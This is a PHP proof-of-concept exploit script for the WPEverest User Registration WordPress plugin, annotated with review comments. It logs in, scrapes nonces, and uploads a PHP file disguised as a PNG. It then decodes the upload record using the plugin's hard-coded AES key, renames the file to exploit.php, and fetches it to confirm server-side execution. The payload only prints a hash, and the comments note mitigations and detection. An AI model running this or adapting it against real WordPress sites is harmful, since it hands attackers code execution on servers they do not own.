<?php
/** Refuse to run under a web SAPI: this script is a command-line tool only. */
if ( 'cli' !== PHP_SAPI ) {
	die( sprintf( '%s can only be run from command line', basename( __FILE__ ) ) );
}
/**
 * Client-side copy of the obfuscation scheme the remote form expects:
 * AES-256-CBC under a fixed key, wrapped in base64, with a plain base64
 * fallback when ext/openssl is not loaded.
 *
 * NOTE(review): key and IV are string constants ('ur_secret_key' /
 * 'ur_secret_iv'), so the scheme gives no confidentiality or integrity
 * against anyone who has read this code; it is reproduced only so the
 * client can produce and parse the same blobs. The IV is the first 16 hex
 * characters of a SHA-256 digest and never changes between calls, and the
 * 64-character hex digest used as the key is longer than the 32 bytes the
 * cipher consumes.
 *
 * @param string $string plaintext for 'e', base64 ciphertext for 'd'
 * @param string $action 'e' to encrypt (default), 'd' to decrypt
 * @return string|false transformed data; false for an unrecognised action
 *                      (openssl_decrypt() may also return false on bad input)
 */
function crypt_the_string( $string, $action = 'e' ) {
	$cipher = 'AES-256-CBC';
	$key    = hash( 'sha256', 'ur_secret_key' );
	$iv     = substr( hash( 'sha256', 'ur_secret_iv' ), 0, 16 );

	// switch compares loosely, matching the original 'e' == $action tests.
	switch ( $action ) {
		case 'e':
			$encrypted = function_exists( 'openssl_encrypt' )
				? openssl_encrypt( $string, $cipher, $key, 0, $iv )
				: $string;
			return base64_encode( $encrypted );
		case 'd':
			$raw = base64_decode( $string );
			return function_exists( 'openssl_decrypt' )
				? openssl_decrypt( $raw, $cipher, $key, 0, $iv )
				: $raw;
		default:
			return false;
	}
}
/**
 * Command-line handling: short flags (-w/-u/-p) and their long forms override
 * the built-in defaults below. The usage string is built from the flag table
 * so the two cannot drift apart.
 */
$options = getopt( 'hw:u:p:', array( 'website_url:', 'username:', 'password:' ) );
$website_url = 'https://lana.solutions/vdb/wpeverest-user-registration/';
$username = 'demo';
$password = 'demo';
$cli_parameters = array(
	'w' => '<website_url>',
	'u' => '<username>',
	'p' => '<password>',
);
$usage_parts = array();
foreach ( $cli_parameters as $flag => $placeholder ) {
	$usage_parts[] = sprintf( '-%s %s', $flag, $placeholder );
}
$cli_usage = sprintf( 'Usage: php %s %s', basename( __FILE__ ), implode( ' ', $usage_parts ) );
/**
 * Apply the parsed options. Short and long forms write the same variable;
 * -h prints the usage text and exits before any network request is made.
 * NOTE(review): getopt() returns an array for an option given more than once;
 * that case is not handled and would reach filter_var() below as an array.
 */
foreach ( $options as $opt => $arg ) {
switch ( $opt ) {
case 'h':
echo $cli_usage . PHP_EOL;
exit();
case 'w':
case 'website_url':
$website_url = $arg;
break;
case 'u':
case 'username':
$username = $arg;
break;
case 'p':
case 'password':
$password = $arg;
break;
}
}
/** check website url: an empty value (e.g. -w '') aborts with the usage text */
if ( ! $website_url ) {
die( 'Please provide the WordPress website URL!' . PHP_EOL . $cli_usage . PHP_EOL );
}
/**
 * check website url is valid
 * NOTE(review): FILTER_VALIDATE_URL checks syntax only and does not restrict the
 * scheme, so a non-http(s) value passes here and is handed to curl unchanged.
 */
if ( ! filter_var( $website_url, FILTER_VALIDATE_URL ) ) {
die( 'Invalid WordPress website URL:' . $website_url . PHP_EOL );
}
/**
 * Session cookies for every request below are persisted in plaintext next to
 * this script and are not removed when the run finishes — delete cookies.txt
 * after use so the authenticated session does not linger on disk.
 */
$cookiejar = __DIR__ . '/cookies.txt';
/** format url: drop a trailing slash so path concatenation below is unambiguous */
$website_url = rtrim( $website_url, '/' );
/**
 * login request
 * Posts the credentials to wp-login.php so the cookie jar holds a logged-in
 * session for the following requests. The response body is discarded and
 * redirects are not followed, so a failed login is not detected here; the
 * first symptom is the nonce lookup below failing on an anonymous page.
 * With an http:// URL the credentials travel in cleartext.
 */
$curl = curl_init();
curl_setopt_array( $curl, array(
CURLOPT_URL => $website_url . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query( array(
'log' => $username,
'pwd' => $password,
) ),
CURLOPT_HTTPHEADER => array(
'Content-Type application/x-www-form-urlencoded',
),
CURLOPT_COOKIEJAR => $cookiejar,
CURLOPT_COOKIEFILE => $cookiejar,
) );
curl_exec( $curl );
curl_close( $curl );
/**
 * get nonce value from js
 * Loads the authenticated edit-profile page and scrapes two CSRF tokens from
 * it: the AJAX upload nonce embedded in a JS object, and the _wpnonce hidden
 * field of the profile form. Each regex takes the first match only; if either
 * is absent (not logged in, plugin inactive, different markup) the script
 * aborts. These nonces are CSRF protection for the logged-in user, not an
 * authorisation check — they are issued to any account that can view this page.
 */
$curl = curl_init();
curl_setopt_array( $curl, array(
CURLOPT_URL => $website_url . '/my-account/edit-profile/',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CUSTOMREQUEST => 'GET',
CURLOPT_COOKIEJAR => $cookiejar,
CURLOPT_COOKIEFILE => $cookiejar,
) );
$response = curl_exec( $curl );
curl_close( $curl );
if ( preg_match( '/"user_registration_profile_picture_upload_nonce":"(.*?)"/', $response, $matches ) ) {
$user_registration_profile_picture_upload_nonce = $matches[1];
} else {
die( 'The upload ajax nonce is not found on the WordPress website.' . PHP_EOL );
}
if ( preg_match( '/<input[^>]*id="_wpnonce"[^>]*value="([^"]+)"/', $response, $matches ) ) {
$save_profile_details_nonce = $matches[1];
} else {
die( 'The save form nonce is not found on the WordPress website.' . PHP_EOL );
}
/**
 * generate exploit temp file
 * The proof payload only prints a constant hash, so the final check can tell
 * whether the server executed it without causing any other side effect.
 * tempnam() creates the file in the system temp directory; nothing in this
 * script deletes it afterwards.
 */
$exploit_file_content = <<<PHP
<?php
echo 'md5("exploit"): ' . md5( 'exploit' );
PHP;
$temp_filename = tempnam( sys_get_temp_dir(), 'exploit' );
file_put_contents( $temp_filename, $exploit_file_content );
/**
 * upload exploit file as profile picture
 * Sends the temp file to admin-ajax.php as a multipart 'file' part declared as
 * image/png and named exploit.png, carrying the scraped upload nonce. The JSON
 * reply's data.upload_files is a blob produced with the same static-key scheme
 * as crypt_the_string(), so the client can decode it here and re-encode it
 * later; a server that relies on that blob being tamper-proof is relying on a
 * key every client already has.
 * NOTE(review): unserialize() runs on data returned by the remote site. When the
 * site is not fully trusted, pass array( 'allowed_classes' => false ) so no
 * object can be instantiated from the response.
 * NOTE(review): if the body is not JSON (HTML error page), json_decode() gives
 * null, the 'success' lookup warns, and the script dies with an empty message.
 */
$curl = curl_init();
curl_setopt_array( $curl, array(
CURLOPT_URL => $website_url . '/wp-admin/admin-ajax.php' . '?' . http_build_query( array(
'action' => 'user_registration_profile_pic_upload',
'security' => $user_registration_profile_picture_upload_nonce,
) ),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array(
'file' => new CURLFile( $temp_filename, 'image/png', 'exploit.png' ),
),
CURLOPT_COOKIEJAR => $cookiejar,
CURLOPT_COOKIEFILE => $cookiejar,
) );
$response = curl_exec( $curl );
curl_close( $curl );
$response_json = json_decode( $response, true );
$upload_files = array();
if ( $response_json['success'] ) {
$upload_files = unserialize( crypt_the_string( $response_json['data']['upload_files'], 'd' ) );
} else {
/** get error message */
die( $response_json['data']['message'] . PHP_EOL );
}
/**
 * change file name
 * The decoded upload record is edited so its file_name ends in .php before it
 * is re-encoded. This is the step the whole PoC hinges on: the stored name is
 * taken from a client-supplied field rather than from the validated upload.
 */
$upload_files['file_name'] = 'exploit.php';
/**
 * save profile (with rename exploit file to php)
 * Re-submits the profile form with the altered record in profile_pic_url.
 * Mitigation on the server side: derive the stored extension from the upload
 * that was validated at upload time, never from this field, and treat a blob
 * sealed with a static key as untrusted input. Detection: a profile save whose
 * profile_pic_url decodes to a file_name with a non-image extension.
 * The response is stored but never inspected, so a rejected save is not
 * reported here — only the final fetch reveals whether it took effect.
 */
$curl = curl_init();
curl_setopt_array( $curl, array(
CURLOPT_URL => $website_url . '/my-account/edit-profile/',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query( array(
'action' => 'save_profile_details',
'_wpnonce' => $save_profile_details_nonce,
'user_registration_user_login' => $username,
'profile_pic_url' => crypt_the_string( serialize( $upload_files ), 'e' ),
) ),
CURLOPT_HTTPHEADER => array(
'Content-Type application/x-www-form-urlencoded',
),
CURLOPT_COOKIEJAR => $cookiejar,
CURLOPT_COOKIEFILE => $cookiejar,
) );
$response = curl_exec( $curl );
curl_close( $curl );
/**
 * test uploaded file
 * Fetches the renamed file from the plugin's upload directory and looks for the
 * hash constant the payload prints (presumably md5('exploit') — verify). A hit
 * means the web server executed PHP from under wp-content/uploads; a hardening
 * that blocks that independently of the plugin is denying script execution in
 * the uploads tree at the web-server level, which makes this check fail even
 * when the rename succeeded. Nothing is printed on a miss, the exit status is
 * 0 either way, and neither cookies.txt nor the temp file is cleaned up.
 */
$curl = curl_init();
curl_setopt_array( $curl, array(
CURLOPT_URL => $website_url . '/wp-content/uploads/user_registration_uploads/profile-pictures/exploit.php',
CURLOPT_RETURNTRANSFER => true,
) );
$response = curl_exec( $curl );
curl_close( $curl );
if ( false !== strpos( $response, '708697c63f7eb369319c6523380bdf7a' ) ) {
echo 'The file exists and contains the exploit.';
}